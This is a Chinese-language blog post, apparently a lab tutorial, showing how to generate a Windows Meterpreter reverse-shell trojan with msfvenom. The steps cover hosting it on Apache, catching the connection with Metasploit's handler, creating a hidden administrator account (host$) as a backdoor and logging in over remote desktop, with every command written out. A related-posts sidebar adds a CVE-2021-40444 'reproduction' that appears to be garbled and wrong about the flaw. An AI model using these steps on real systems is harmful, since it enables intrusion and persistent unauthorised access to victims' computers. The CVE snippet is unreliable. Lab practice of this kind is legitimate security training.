2021-12-09 使用kali生成木马,渗透Windows系统

最新推荐文章于 2024-07-22 14:47:45 发布
最新推荐文章于 2024-07-22 14:47:45 发布
阅读量1.3w 收藏 182
点赞数 22
分类专栏: 其他 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58489132/article/details/121816285
版权
本文详细介绍了如何使用Kali Linux中的Metasploit框架生成木马,并通过Apache服务部署到Web服务器,诱导Windows 10靶机下载执行,最终实现对靶机的远程控制。实验步骤包括生成木马、开启服务、设置攻击模块、渗透及验证等关键环节。
摘要由CSDN通过智能技术生成

本文章仅供学习和参考!

欢迎交流~

目录

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

5. 开启apache服务,输入命令:

     可用以下命令查看服务开启状态:

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

7. 开启postgresql服务,其端口号为5432,输入命令:

     可用以下命令查看服务开启状态:

8. 查看端口,输入命令:

9. 开启msfconsole,输入命令:

10.设置攻击模块并运行,输入命令:

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

     若出现乱码现象,可输入命令:

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

cp evilshell.exe /var/www/html

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

rm 文件1 文件2 ... 文件n

5. 开启apache服务,输入命令:

/etc/init.d/apache2 start

     可用以下命令查看服务开启状态:

/etc/init.d/apache2 status

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

      将文件下载到桌面,方便测试:

7. 开启postgresql服务,其端口号为5432,输入命令:

/etc/init.d/postgresql start

     可用以下命令查看服务开启状态:

/etc/init.d/postgresql status

8. 查看端口,输入命令:

netstat -ntulp

9. 开启msfconsole,输入命令:

msfconsole

 

10.设置攻击模块并运行,输入命令:

use exploit/multi/handler     //选择exploits

set payload windows/meterpreter/reverse_tcp   //设置payload

set LHOST  攻击者IP        //修改LHOST参数
    
set LPORT  监听端口        //修改LPORT参数

show options              //查看需要设置的参数

run 或 exploit            //运行攻击模块

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

shell

     若出现乱码现象,可输入命令:

chcp 437

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

net user host$ /add       //添加隐藏用户host$

net user                  //查看用户

net user host$ 密码       //为host$用户设置密码

net localgroup administrators host$ /add    //将host$用户加入到管理员组中,从而提升权限

net user host$            //查看host$用户信息

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

rdesktop 靶机IP

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!

      添加用户:

夕阳的街道
关注
  • 22
    点赞
  • 182
    收藏
    觉得还不错? 一键收藏
  • 15
    评论
专栏目录
kali木马入侵win7系统
皮卡乒的皮卡乓
06-19 2635
kali利用木马攻击win7
kali生成木马
Massimo__JAVA的博客
04-25 2059
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali
复现|使用Kali生成木马渗透Windows系统
Maricopig的博客
05-13 1278
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
【二进制安全】堆漏洞:Double Free原理
cc123489ll的博客
04-24 318
我们先不用管 修改已被释放的空闲块中的内容到底有什么用,我们现在只需要知道。
如何使用kali来入侵(渗透)一台windows_kali利用win11漏洞
最新发布
2401_85773496的博客
07-22 854
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
Kali生成windows木马程序
qq_51950323的博客
09-07 9881
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1190
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
网络安全--Kali渗透Windows
夜思红尘的博客
05-14 1230
Kali里的msfvenom木马制作工具是一个十分好用的工具,这篇文章主要讲述的就是这个msfvenom工具
msf之msfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3905
msfvenom的使用
kali生成木马程序渗透linux系统
05-24
首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要了解目标系统的漏洞情况,选择合适的漏洞利用...
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2872
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1502
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
kali入门到入狱之 生成木马程序的利用.
网络安全领域___专研者.
03-17 4449
当您忍不住点击一个(美女图片)或(帅哥图片)的时候,或者是您安装一个了来路不明的程序程序时,再或者是您随意点击了一个链接后,可能您的设备已经沦陷了.
Kali渗透Windows服务器
2301_77732591的博客
06-27 589
(2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2065
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
kali使用msfvenom入侵win7
记录日常学习
06-06 328
kali使用msfvenom
Kali linux windows木马(外网) 保姆级教学
m0_73135216的博客
01-01 3402
kali linux 木马实现外网控制(保姆级教学)
kali-linux之利用Metasploit操控win7系统
qq_42877870的博客
04-05 1885
准备一台windows7系统的虚拟机作为靶机(我用的靶机地址为192.168.1.9) 一台装有kali-linux的虚拟机(我的kali ip地址为192.168.1.10) 2.kali生成被控制端(通过msfvenom生成木马Kali终端输入: msfvenom -p windows/meterpreter/reverse_tcp lhost=192...
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值